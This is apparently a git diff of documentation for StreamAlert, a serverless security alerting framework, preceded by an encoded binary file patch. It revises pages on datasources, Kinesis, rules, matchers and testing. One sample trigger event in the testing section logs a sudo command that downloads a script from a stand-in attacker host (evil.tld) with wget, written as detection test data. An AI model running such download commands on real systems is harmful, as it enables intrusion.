z2eSoRPdPf3+Js;D!%eB2BO-hfNLZ)Y4TioV?`mF*>-7zCp5eTl;i%}kn$=J547H3; zg^rJ3#rP7{Rdh0#X!Knmi9}AcJ3L{{38@r0uTl+g#F)I$P7A#olHJlzO8C4Th#g39@2Fp? z-^OLq>JnOpdy^Mr=2F(H}@Nc;nK)FHs|ih zeYC>L8uw_HDrwRq#%8LUF=Byw@t1$l>Dk_qvE+B+i^STH*;PgM{)izpl0vR z@UIL7)Wz*r+~XcD?tqWwERaZ-1OyhL%3yMSgF%1V?tMcf}wud=kfGw@k|{@ z6OW3S2xHSpYqrf>Z$@05RkoIS+=R6~P0C#m&uG&OgnWw*!u~6lCuH{18CS@8F}R5V z9Y9LdXUktLwHJtYJH;_bzO|{jE=^ufJz8{7TO67;PmJ;ePsj2Q9y48ZcC6M&l%Co zFqjqDKH#Uos2CTxy63ePwyuy>G;lC`rU!W>g7wWiV$th9nQ{l<65^b*X2qM2r<~?o zntVmcUoSwkP{G+^j^KBP#yG5ap(W3(Uak1$m&ZdM-kIe z2JIpf@nAv;UmKza>9$>&v0YmPLj&T3%FjJlB`L4aofk2#N}qocyGYwFCmJ12Ut7S_ z-Jp<;ua;HGx;8$Wh@I;}uYCx6<@4-ZNO5?;Y{1=rejMmgbG>dx7FfYa_lB7BFsdIp z{?Wk&jjGdHs_Xh>X@-eoN>iFNZuZVo(~lyS1XhiRUFd@Wnkz2|eB;~sRB8Wku%hWe z?(2=KwOmiNZQh!0Okx4Ls8F4`4^hcp(cf)sI)fQlpz(}nkNvz>++pUsi}avWR_WZ7Mz0z(Rg z0C{`KiRiaRaeU_vcX$KsDq7og$bl-+yd*nX^~HHcdEJFm9yhhQ$6!{Dmi545$6um< zxY_w3S#{}Fp1CPgBBv3T6uel-`(8YPA?Jk>;uPnU<$_^3IvHv62tU?@tBnn(dmD?|33eW(it7b2 zD+(r`Mn?;wPUEhvt)<|(*bVw38tY%NeS@(>IbB^{NqOSwGd}dX92tZT$!>Fih=W_# zo=#As=YP3M>AOfy?nvNxC6q>TQW2<`=@>Gj!P@woy27WtS0fz}Q^dZ+QNG;C9m6hv zQRpTSvmOLt(}5#*;ye=G-%kQf5RD-dTPyEXJy-TTUOLxb3zRq5+=ZbS~DJ|=Dxc;7s z=;QVPap1j>iO)#wFCHlMZg*d@TmM^)y8`xIKMtd5jI#g@02Y5-*lSM1zJBk~Hr1!4 z&Zi|`gZd%L=f}28^f|n7j&bLg7H+(_)foAINiTkw^p?7EuA0{*PIilVi=sw!)22lFeJ2@6c!rc5<)fpi08qP@va@79u{ouuDH(j3&ShAZfqhpdi^%jUT~fn^jE zL&CTfL3t~+H-04%(pY;fFqLxCxbJZ3i~Fi_=Xgz%zZW%SP@zZW`fgT=kV;MN(1=Qrum(j6?6KX#MTW zz&Zo9vPNo3&zm0(CK0o_G$1 zM}tXInHp_#01|eV(+@G)EO7>wMtk(-C;gcKVlVullLBpLhK;7ojRR!R;} zeG#F#Lh=eDuQBAFA*24m!)k3qa`60ppewm4qJY>sBF>qzxMuPIB&fYTxal&C(=gAm z2xum)>hc^y%n!^(; zlDD9y1ftPx_r?#T8k|@r45dv`ybl~o!J~U8C$e)6Ogc;nzZRMp(T)v2G5TH^cHM&Q z8NFPaKZiF>PO!n73%=qe z47DRcigdk9jJ5-MQR0VAvYp4zZK>UTebT^$<}M_y{yWlySj1SE&lSo4qAFj$Z!=w$ z(uIk96|Sy?f-60b&dmpW@p4b&comf^--%~Yq zQD5u`lDd%o&-Djd*CytltvrXs@ zBiT1dFfeVxJ}btdFFH&RL!^g4G0s7DrS-^Fe0O~)d>{+RA=d*7Jq)Gw;2x?!Cy^*) zpxt#m0cU4pzIKN9U!seuUq)_F-BT%V4*JG?Oc2caQ@tMVa@;~LF=35wDlwd|N)bn) zY31S8MC{bQNlqhoYVEb{#AfJ*<1277LY{;Dzni-39Xr!q08y{RQN^LWLYr{148$M|h0yr$+MmP{?+tTRaj}*1uwvB7(yl zm3zmG=|yw8^$&hWfvWHD=t(^ue}PJ^^|$<#Nt#d7t-F@>`TWNjQjcAmDUnMV_^dLX z`Oo_Ze7Q)K&icB);1t2)U+!?$)&eg3UA76-XV!xxkaZCWPD@`n0dF}QuE>&xhT+T145@UjCjpg@g)tE z8s}-R7?yqtqV0d5*_zn<=)R3wGP>~6Z}1ozKipeE9-_=|#nH=!PI)a(U&adVKUv?t z|30zh_w$}@z|~Mn4rs8BUqfAoJV&W%7zd^0aJ@zob-~yR+1beE((7J&qXf+MIw+&) zNZ%Q{d=0uZ>1@L&r?q+P(Vk)R&50im?P7n5zAnpB!B@&)LD*SI2}oJ|VtCU{ zN;k|lQnRuvyRqc96v-QoO@VqT^E9grgFAHWvij*e)X~<3v8+?w>+i7JA}0RkcxHA1 zLG$b{HN&7O4gQ{P>>lVfFOg>`X2u*QHO#s<7fR-odXS!0Y){dGtjy$e<19kNJ~(|EKi+rlr{q7eH1UU=!yGejFSUJHgWD>-(h+5}O#2gk==$?HrT{ zL_~{y$Nn22e3g%L{lIr|{K4j(|5cRW_{@gf{JurDe(O(;cpZ__q+XG}MT8T20qW{` zIB1B;rp%Iw3l&CFC*W?f&%ye~R^KuD1zvojOb_=@&H(Zia_~Z%b8W99 zU-uZH`hM$_pM#hTYH}oaeNkZ+P4Dw;%@d3z2#Q!@V&41%P>@596#hBq^ZIYg9WpG1 zTye#T^4oPm+Wy@Yc^y6E|mlN9Uz9;;_z$^9l)YUlf(EI`6=TJ8;cN|(6i=gMA zpnZsCI=egPr_O$eM>}Y)+48GTUETiYG>JtjK%B0WZh{vrpvc5wazT7fP!49S9{;PX zmDP_;>yFXEnGXbmVV11mV;cs|pgpId=i7LKXde?#a%o-UbzgC^txt*Uh-MSZlE=D;0 z*7S;dDZBZ6biz zZ*VO-DIM7t<^&ExAAsIjsL|0Ik{TB>gP$nJM|$=^_JH+A3a&%k>x>r+lVIAO{U6n4 z>>Jd%XDKdwl7nJ%;c=169<)?R5AWs-xN&i3Ni4EAz&W<9RY%bUQj)KB?8?PD@D^y<1O!CeDM~&(%~~8$uq`@7PYrS}iU{1n5Wqe$f`u z8?Wrd+IqxEpCz1q8PO}SCJyao>b&*tgsvT;rL`q>dHN}nlE=Q69+1bL4tME7SOC&h zmD^gHkj^^2>K#%4Hm#`j63)3f{{e@_MD^y;Z&M$cxZ`9%nEMvMI*r=xFeV^Z?FBD{ z9(hw!#UDDXD~K|`+F=QLa?M8vVdT6$VEaGSo&7)4>mSG66cWbC{k>MvosmU046}_C zsYKdwZ%7Bruekmxygw-9i)l5naJcO$2m)G#ukMQU-$L>I34HvH+(-o zUXRapz2DdS^LTu&>+^m;U)N`T?4B9D!m-?$a`-uA|e~VOC=5#b(VJ68%|ceRZE5 z(OWQDd|hXq8ujS1QcoiAdQ&$*n~|2?NK<8wmtOK@jqWcln5^`eRh1+>w%SY^T|0Ai zNUx|Np7FBxCKDRO%1mlfCmGjVcDB|p_mCqLM=+-$O&f7f(sc#hT3Vp#c0HjRLzruo zj$a;fyUBDCzi*b2#_+2-nQz0$IyD_%1`qePkJWscR$H*Q=Z_)7sCQ#L;?e7ct^vQ* z-25bN%Fj%pL7vyfzPbwu-V^xkhSB&aS2Ax?IJ+R}$MBX|(?vvayDT?`evKQN4I&Bl zu5q4~7ZDrhXOx%oc&VWrq|Vm`%3tti)Tsa*BpSvdtx`yQ_`d#@rs)SE7N?0I)PqN- z9)ef&*d95lajc>j7XLC$aWj=;| z^UrxCMpae@WZD)#Xdry}hzob?zE6B}VaHU`E4SLPw^{o+9NhQ>x~>M|gO9 zN2aYfW)yzo^MXWHZwpvw%{~lk%eMINm6k1;`p#;(!udDe08%?$dCDJtUMl~cMYg-^QBT{&J&~-Ia>ox8Il0u`*Q~x-e>9$LDb2 zMRzPRyc04uFAe5`m##|U<>{{zpM*8=gc~UtHXO%-=XmT&6)C(_?sdbF%q8z${z|vk zS{*xtf^9`d^6d&&7%Q(*R{*SH@6uj+);HkCJGH9-8^SM%DP!=fjUwA;h|?p2$q^r` zuRz7IJn9Vp;{Fn^2Fwthz>?MKf;U5up<^9}R06bbPj}aL4WVel{q&Ztq?U>ffU->Z zHGckKa{MKbS83AoxhSP(oS8Z)T23Y3(uHVq3L;9!$!XEQ%xcHQ3ge_Efy&TD;}ER` zR+Wdn5NSHiK2n>V^v+<~(R0z)iBua!OTB(iC4d~K7Jr+e33h_wyu}3GHR%LzMV(Du zZM?3Zx)nNwKm!&|@R>6;I?>-GInQa67|o}NZE9T#ItZ3zb$v}^UqVOouJj%iRdsvV<>WFzn-|BxgX3mS9M&V zgqhWQzQ11?LAV$FB~wmH%LB;OZxeAfh~YxC=)iG*K~A|vyT-nrU}#)JiRk!vN0GvQ zgm#d+%4StY^s(ubq$ldVkx+Yrl#xq+7LxCZ8HExGTJ@e+h7PTkc$R=-YUy8q+TYCH zvOfJKnFjeI#2lT85d!N_C&*SZRTn$ar#j#uy=Z>IcC@0L=0OXe*uy~I5>6Su=^>+% zlR9!?t*CViD;{5ZnviyB5VfJx8E=5Re0blkjO9dF&FF>O1D8j9N`8VxQ*k;EEemeu zRwzELVBU}QYXQgH1Jz+7sfA#=Kdgu|%%#GsRk$kbeQc4HA68BU>k0e7uwLV--0sVF z7g_nQ78*!Z7vNO=74t|@2Ipt~aiCC?+}HX0Tq87WBq)KhZz8&7ujg3$A+VVG5B6lg zQ`$EsIw0C#rOI0l$R2G{bFiGf%)UOLCz#bRuj(Tvf)m0+_Op_Cd^ zlMSD@@JeorI|*}5v0Tzio4*#3R<|n@`liYGExGIuT?wr|YP|;NPj~F~u7g&M#aO`W z30*Le6<}Duep)d&*)jH*L2a_pk{+j{PV?#qgM#I=*^9*if0>1rDd2GLb*-;9%qi?f zz>*UiU#oH4m+~_2Atjd4lH?4#CMRVdyq(i;GDEY;-Bcs4Z9nJRmEW%|M;c^B{YYt@ zFRlZtt|**H?gmvU(mS^^n*n5G^CpslE%)g~n$oEeY|G(A${(|u>%wde(k|GO&DH#X zq5NCu%p_k*`mLHK;hPBnbfQ7xij5PjAL2hn%C!0^wu!x=E!SC8Iq5ba=RXAMe}rt~ zPu&4V&Kyk6Hfy7T4snmx)VIE6xTDu|6J4yr4s5;;+sf+<9CUlDfjIMvi!wrxx-@cb z!fkO3HdCyHfLAzXZv?mu1dl{nCSRB#G0~Sa) z!N)TAD2Oo7q?uxi;kx2`15iyinfS2lacyAj@eovjGXD;Wd-8Eyd&nWN56l$YjKPy6 z>sykli|XJ5J$K6KHy%J@eHLX$hY!*^62Z+u$>zR>?MrB8t!~% zD>}p<4}a|UN1uYfo=!w-LmUC^IjA&D$g=`ixSJTM5iF%d`;)FEw*`a`0e!t8iC(bA zc!HUwXUh{d;BRbvxdVFwTJ%;R%Ve-z?4@og+%Y28q;*SkN(Awq^3*$RBO&)o_3q*U z41=4?qgc#PVxqWD)>mrVWK={jH~5V zr!r#4iF;@)%0`tsq+h;hL&jHbO~I5!UCJqfi8CvahXO=@uO~74&mT7nrc&l|e7p>Y zRVJ8!B0F;e?>d3j#_F9v-8Qb|#XKAZ&tuUi5i=BCZ4GvC`NfyNlnJLRPsIL+VGJTR z#KXfLBBn(2=i&>G!(IVfj-Niqc4dl6Kxz8dL&W$#|*-|zBc^159k!L z(=kbBO@hoN(lO@XP)&*=;VvZ}1twsW0xjq+c90 zztuO`NZnS5|Lu+h+B@=x*cZq@U)vuBG){ltn;-!Oh@)36O8fr>tJAjmVa355^v)!h z0KINjZCjeL)5is9$Rt1L|2|1TvIvMKmXchP2NnLYZzK&gxSYG7zT==Qpq?9jDous$ z_=2_p60_1*PXp41?_jkL5Cx4(dglR!l<0P^*9JfX#^!ABzhJct5EkYUyO|xUs=I-( z7(70lzT;LB01bz^-?7))v0Abnmfa^G?YPxv1Uw(vD*1{XtN%N_<)09#CjpeXkJA3g f9jpI8!AST9G7M;PeG*1a7XdB@l#^Wzpa=UeDU{jG literal 0 HcmV?d00001 diff --git a/docs/source/account.rst b/docs/source/account.rst index 8491cb348..d66358817 100644 --- a/docs/source/account.rst +++ b/docs/source/account.rst @@ -24,7 +24,7 @@ Open ``variables.json`` and set ``account_id`` to this value. prefix ~~~~~~ -Open ``variables.json`` and set ``prefix`` to your company name. +Open ``variables.json`` and set ``prefix`` to your company or organization name. Administrator ~~~~~~~~~~~~~ diff --git a/docs/source/clusters.rst b/docs/source/clusters.rst index 38e96b7a5..cc801ed5a 100644 --- a/docs/source/clusters.rst +++ b/docs/source/clusters.rst @@ -7,7 +7,7 @@ StreamAlert will deploy separate infrastructure for each ``cluster`` (environmen What constitutes a ``cluster`` is up to you. -Example: You could define ``IT``, ``PCI`` and ``Production`` clusters +Example: You could define ``IT``, ``PCI`` and ``Production`` clusters. **Strategy** diff --git a/docs/source/conf-datasources.rst b/docs/source/conf-datasources.rst index cf4d40eae..ba19f894a 100644 --- a/docs/source/conf-datasources.rst +++ b/docs/source/conf-datasources.rst @@ -1,22 +1,27 @@ -Datasources -=========== +Datasource Configuration +======================== + +For background on supported datasource types, read `datasources `_. Overview -------- -Datasources are defined in ``conf/sources.json`` +* Datasources defined in ``conf/sources.json`` control which datasources can send to and be analyzed by StreamAlert. +* Each datasource (``kinesis``, ``s3``) contains a mapping of specific datasource names (kinesis stream names, s3 bucket IDs) along with a list of logs coming from that source. +* Logs are defined in ``conf/logs.json`` +* Each log in the list of ``logs`` dictates to StreamAlert how to parse incoming data from that entity. Data will only be analyzed if their type is defined here. Example:: { - "kinesis": { # define each kinesis stream w/respective logs - "abc_corporate_stream": { # kinesis stream name - "logs": [ # expected log types + "kinesis": { # define each kinesis stream w/respective logs + "abc_corporate_stream_alert_kinesis": { # kinesis stream name + "logs": [ # expected log types "box", "pan" ] }, - "abc_production_stream": { + "abc_production_stream_stream_alert_kinesis": { "logs": [ "inspec", "osquery" diff --git a/docs/source/conf-schemas.rst b/docs/source/conf-schemas.rst index 50f265da6..c78931890 100644 --- a/docs/source/conf-schemas.rst +++ b/docs/source/conf-schemas.rst @@ -43,7 +43,7 @@ Here are the basics: * An empty hash ({}) implies zero or more elements * Schemas can be as tight or as loose as you want (see Example: osquery) -JSON Example: inspec +JSON Example: Inspec -------------------- Schema:: diff --git a/docs/source/datasources.rst b/docs/source/datasources.rst index 0771e29c2..67a8b6036 100644 --- a/docs/source/datasources.rst +++ b/docs/source/datasources.rst @@ -1,5 +1,5 @@ Datasources -============= +=========== StreamAlert supports: @@ -8,10 +8,12 @@ StreamAlert supports: * Log Forwarding Agents\* * Code/Applications\* -\* *must send to a Kinesis Stream* +.. note:: \* *Must send to a Kinesis Stream* + +To configure datasources, read `datasource configuration `_ Amazon S3 ----------- +--------- StreamAlert supports data analysis and alerting for logs written to configured Amazon S3 buckets. This is achieved via Amazon S3 Event Notifications looking for an event type of ``s3:ObjectCreated:*`` @@ -29,9 +31,30 @@ Example non-AWS use-cases: * Web Application logs (Apache, nginx, ...) * SaaS logs (Box, OneLogin, …) +AWS Kinesis Streams +------------------- + +StreamAlert also supports data analysis and alerting for logs written to AWS Kinesis Streams. +By default, StreamAlert configures an AWS Kinesis stream per `cluster `_. + +Optionally, StreamAlert can also utilize existing streams as an additional source +by adding the following into your generated Terraform cluster file (found in ``terraform/cluster-name.tf``):: + + // Enable a Kinesis Stream to send events to Lambda + module "kinesis_events_" { + source = "modules/tf_stream_alert_kinesis_events" + lambda_staging_enabled = true + lambda_production_enabled = true + lambda_role_id = "${module.stream_alert_.lambda_role_id}" + lambda_function_arn = "${module.stream_alert_.lambda_arn}" + kinesis_stream_arn = "" + role_policy_prefix = "" + } + +There are several ways to send data into AWS Kinesis, as listed below. Log Forwarding Agents ----------------------- +~~~~~~~~~~~~~~~~~~~~~ StreamAlert utilizes AWS Kinesis Streams for real-time data ingestion. @@ -42,9 +65,8 @@ Log forwarding agents that support AWS Kinesis Streams: * **aws-kinesis-agent** * **osquery** - Code/Applications ----------------------- +~~~~~~~~~~~~~~~~~ StreamAlert utilizes AWS Kinesis Streams for real-time data ingestion. @@ -52,15 +74,3 @@ Your code can send data to an AWS Kinesis Stream via: * AWS SDK (Streams API) * KPL (Amazon Kinesis Producer Library) - - -AWS Kinesis Streams -------------------- - -StreamAlert can utilize existing stream(s) and/or create/deploy new streams to support log forwarding agents or code/applications. - - - - - - diff --git a/docs/source/getting-started.rst b/docs/source/getting-started.rst index 249cfbb14..23cee0343 100644 --- a/docs/source/getting-started.rst +++ b/docs/source/getting-started.rst @@ -1,16 +1,15 @@ Getting Started =============== -Perform the following on your laptop or development machine +Perform the following steps on your laptop or development machine Dependencies ------------ -1. Install Python2.7 -2. Install `pip `_ -3. Install `Terraform `_ -4. Download StreamAlert: ``git clone https://github.com/airbnb/streamalert.git`` -5. Install dependencies: ``pip install -r requirements.txt`` +1. Install Python 2.7 and `pip `_ +2. Install `Terraform `_ +3. Download StreamAlert: ``git clone https://github.com/airbnb/streamalert.git`` +4. Install dependencies: ``pip install -r requirements.txt`` .. note:: For Mac OSX/Homebrew users, add the following to ~/.pydistutils.cfg: @@ -19,16 +18,17 @@ Dependencies [install] prefix= -Configuration -------------- +Quick Start +----------- -1. Define your `account `_ +1. Define your `AWS account `_ 2. Define your `clusters `_ 3. Define your `datasources `_ 4. Define your `schemas `_ -5. Define your `kinesis streams `_ -6. Define your `kinesis firehose `_ -7. Define your `lambda settings `_ -8. Define/deploy your `secrets `_ +5. Configure your `kinesis streams `_ +6. Configure your `kinesis firehose `_ +7. Configure your `lambda settings `_ +8. Write your `rules `_ +9. Define/deploy your `secrets `_ Now it's time to `deploy `_! diff --git a/docs/source/index.rst b/docs/source/index.rst index 3700a2443..f37b55122 100644 --- a/docs/source/index.rst +++ b/docs/source/index.rst @@ -10,7 +10,7 @@ StreamAlert StreamAlert is a serverless, realtime data analysis framework which empowers you to ingest, analyze, and alert on data from any environment, using datasources and alerting logic you define. -For more details, see our announcement post: https://medium.com/@airbnbeng/e8619e3e5043 +For more details, see our `announcement post `_. At a high-level: @@ -25,9 +25,9 @@ At a high-level: Other Links: -* Github: https://github.com/airbnb/streamalert -* Twitter (unofficial): https://twitter.com/streamalert_io -* Slack (unofficial): https://streamalert.herokuapp.com +* `Github `_ +* `Twitter (unofficial) `_ +* `Slack (unofficial) `_ .. note:: Docs are under construction, don't mind the dust! diff --git a/docs/source/rules.rst b/docs/source/rules.rst index da13fd954..88abd23e5 100644 --- a/docs/source/rules.rst +++ b/docs/source/rules.rst @@ -9,35 +9,52 @@ Rules * Rule alerts can be sent to one or more outputs, like S3, PagerDuty or Slack * Rules can be unit tested and integration tested -Location --------- +Getting Started +--------------- + +* Rules are located in the ``rules/`` sub-directory. +* Generally, a separate rule file should be created for each cluster defined in the ``variables.json`` file. + * examples: ``corp.py``, ``pci.py``, or ``production.py`` + * This structure is optional, you can organize rules however you would like. -Rules are stored in the ``rules/`` sub-directory +After defining a new rule file, you must import them in the ``main.py`` file (found in the repo root). For the given examples above, this would be:: -A separate .py should be made for each cluster you defined in the variables.json file. + from rules import ( + corp, + pci, + production + ) -Example: ``it.py``, ``pci.py``, ``production.py`` +.. note:: If you skip the above step, your rules will not load when AWS Lambda runs. Overview -------- -All rules take this form:: +Each new rule file must contain the following at the top:: - @rule('example', logs=[...], matchers=[...], outputs=[...]) - def example(record): - # analyze the incoming record w/your logic - return ( - # return true if an alert should be sent - ) + from stream_alert import rule_helpers + from stream_alert.rules_engine import StreamRules + rule = StreamRules.rule -``record`` is an incoming record from any one of the configured datasources. You define ``logs`` and ``matchers`` to ensure the logic within the ``def`` function block only runs against logs that it should. +All rules take this structure:: + @rule('example', + logs=[...], + matchers=[...], + outputs=[...]) + def example(record): + # record analysis # analyze the incoming record w/ your logic + return True # return True if an alert should be sent + +You define a list of ``logs`` that the rule is applicable to. Rules will only be evaluated against incoming records that match the declared log types. Example ------- Here’s an example that alerts on the use of sudo in a PCI environment:: + from fnmatch import fnmatch + @rule('production_sudo', # name of the rule logs=['osquery'], # applicable datasource(s) matchers=['pci'], # matcher(s) to evaluate @@ -58,25 +75,24 @@ Parameter Details logs ~~~~~~~~~~~ -``logs`` defines the log sources the rule supports; the ``def`` function block is not run unless this condition is satisfied. - -A rule can be run against multiple log sources if desired. +``logs`` define the log sources the rule supports; the ``def`` function block is not run unless this condition is satisfied. -Log sources (e.g. datasources) are defined in ``conf/sources.json`` and subsequent schemas are defined in ``conf/logs.json``. For more details on how to setup a datasource, please see the Datasources section. +* A rule can be run against multiple log sources if desired. +* Log sources (e.g. datasources) are defined in ``conf/sources.json`` and subsequent schemas are defined in ``conf/logs.json``. For more details on how to setup a datasource, please see the Datasources section. matchers ~~~~~~~~ -``matchers`` defines the conditions that need to be satisfied in order for the ``def`` function block to run against an incoming record. +``matchers`` define the conditions that must be satisfied before rule is evaluated. This serves two purposes: -Matchers are defined in ``rules/matchers.py`` +* To extract common logic from rules, which improves readability and writability +* To ensure necessary conditions are met before full analysis of an incoming record -Matchers can serve 2 purposes: +Matchers are defined in ``rules/matchers.py`. If desired, matchers can also be defined in rule files if the following line is added to the top:: -* To extract common logic into helpers. This improves readability and writability -* To ensure necessary conditions are met prior to analysis of the incoming record + matcher = StreamRules.matcher -In the above example, we are evaluating the ``pci`` matcher. As you can likely deduce, this ensures rule logic is only run if the incoming record is coming from the pci environment. This is achieved by looking for a particular field in the log. The code:: +In the above example, we are evaluating the ``pci`` matcher. As you can likely deduce, this ensures alerts are only triggered if the incoming record is from the ``pci`` environment. This is achieved by looking for a particular field in the log. The code:: @matcher('pci') def is_prod_env(record): @@ -86,14 +102,14 @@ In the above example, we are evaluating the ``pci`` matcher. As you can likely d outputs ~~~~~~~ -``outputs`` defines where the alert should be sent to, if the return value of the function is true. +``outputs`` define where the alert should be sent to, if the return value of the function is ``True``. -StreamAlert supports sending alerts to PagerDuty, Slack and AWS S3. As demonstrated in the example, an alert can be sent to multiple destinations. +StreamAlert supports sending alerts to PagerDuty, Slack and Amazon S3. As demonstrated in the example, an alert can be sent to multiple destinations. Helpers ------- -To improve readability and writeability, you can put commonly used logic in functions in ``stream_alert/rule_helpers.py`` and then call the function from within your rule. +To improve readability and writability of rules, you can extract commonly used ``Python`` processing logic into custom helper methods. These helpers are defined in ``stream_alert/rule_helpers.py`` and can be called from within a matcher or rule. Example function:: @@ -113,50 +129,62 @@ Example use of that function within a rule:: @rule('foobar', ...) def foobar(record): - ... - user = ... - user_whitelist = ... - ... - return ( - in_set(user,user_whitelist) - ) + user = 'joe' + user_whitelist = { 'mike', 'jin', 'jack', 'mary' } + return in_set(user, user_whitelist) -Testing -------- -The ``test/fixtures/kinesis/`` subdirectory will contain folders for each cluster/environment. +Rules Testing +------------- -Within each of these folders you can define: +In order to test the effectiveness of our new rules, you can run a set of local integration tests to verify alerts would be triggered. The `stream_alert_cli.py` command line tool comes built-in with a `lambda test` command. + +Configuration +~~~~~~~~~~~~~ + +To get started, create (or find) an example log for your given rule. If the rule you added expects incoming records to be JSON, add a raw JSON record into the ``trigger_events.json `` file for the related stream. + +Example logs will be stored in the ``test/integration/fixtures/kinesis`` subdirectory. A new folder should be created for each Kinesis stream as declared in your `sources.json `_. + +Within each of these folders, add the following two files: -* ``non_trigger_events.json`` * ``trigger_events.json`` +* ``non_trigger_events.json`` -This allows you to unit test your rules for expected behavior. - -Recall our earlier example that alerts on the use of sudo in the pci environment. In ``trigger_events.json``, you would add an example log that should alert:: - - { - "name":"linux_syslog_auth", - "hostIdentifier":"foobar", - "unixTime":"1470824034", - "decorations":{ - "envIdentifier":"pci", - "roleIdentifier":"memcache" - }, - "columns":{ - "tag":"sudo", - "message":"john_adams : TTY=pts/0 ; PWD=/home/john_adams ; USER=root ; COMMAND=/usr/bin/wget http://evil.tld/x.sh", - "facility": "authpriv" - }, - "action":"added" - } +These files allow you to separate true positives from false positives. + +Recall our earlier example that alerts on the use of ``sudo`` in the ``pci`` environment. In ``trigger_events.json``, you would add an example log that should alert:: + { + "name": "linux_syslog_auth", + "hostIdentifier": "foobar", + "unixTime": "1470824034", + "decorations": { + "envIdentifier": "pci", + "roleIdentifier": "memcache" + }, + "columns": { + "tag": "sudo", + "message": "john_adams : TTY=pts/0 ; PWD=/home/john_adams ; USER=root ; COMMAND=/usr/bin/wget http://evil.tld/x.sh", + "facility": "authpriv" + }, + "action": "added" + } .. warning:: One event per line. This log was put on multiple lines for readability and education purposes. And lastly, in ``non_trigger_events.json``, you would add an example that shouldn't fire. +Running Tests +~~~~~~~~~~~~~ +To test an example record coming from Kinesis:: + + ./stream_alert_cli.py lambda test --func alert --source kinesis +To test example records from S3:: + + ./stream_alert_cli.py lambda test --func alert --source s3 +.. note:: coming soon - Amazon S3 testing instructions \ No newline at end of file diff --git a/requirements.txt b/requirements.txt index 012f16e68..cee18212b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,8 @@ +awscli==1.10.5 boto3==1.4.4 -nose==1.3.7 coverage==4.3.4 +jinja2 netaddr==0.7.18 +nose==1.3.7 virtualenv==15.1.0 -awscli==1.10.5 git+git://github.com/fugue/emulambda.git \ No newline at end of file